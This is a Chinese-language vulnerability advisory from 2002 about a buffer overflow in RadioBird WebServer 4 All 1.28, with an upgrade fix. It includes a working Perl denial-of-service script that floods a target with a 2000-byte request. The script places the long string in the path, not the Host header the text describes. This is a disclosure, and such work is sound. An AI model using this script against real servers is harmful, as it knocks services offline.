Radiobird Software WebServer 4 All Host字段存在缓冲溢出问题发布时间:2002-10-29 更新时间:2002-10-29 严重程度:高 威胁程度:普通用户访问权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:6034 受影响系统 RadioBird Software WebServer 4 All 1.28详细描述 WebServer 4 All由于没有正确检查HTTP头字段中的'Host:'段数据。攻击者可以提交超多的数据导致系统发生缓冲区溢出,可以导致以WEB权利执行任意代码。 测试代码 #!/usr/bin/perl -w use IO::Socket; $host = $ARGV[0]; $port = $ARGV[1]; $evil = "A" x 2000; print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n"; print "Usage: $0 host port\n"; print "Connecting...\n"; $socket = IO::Socket::INET-> new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Connection failed.\n"; print "Attacking...\n"; print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n"; close($socket); print "\nConnection closed. Finished.\n\n"; 解决方案 RadioBird Software WebServer 4 All 1.28: RadioBird Software Upgrade WebServer 4 All 1.32 ftp://ftp.freeware.lt/anonymous/Soft/w4asetup.exe 相关信息 Tamer Sahin <ts@securityoffice.net>. 参考:http://online.securityfocus.com/archive/1/296759 相关主页:http://www.freeware.lt/ |
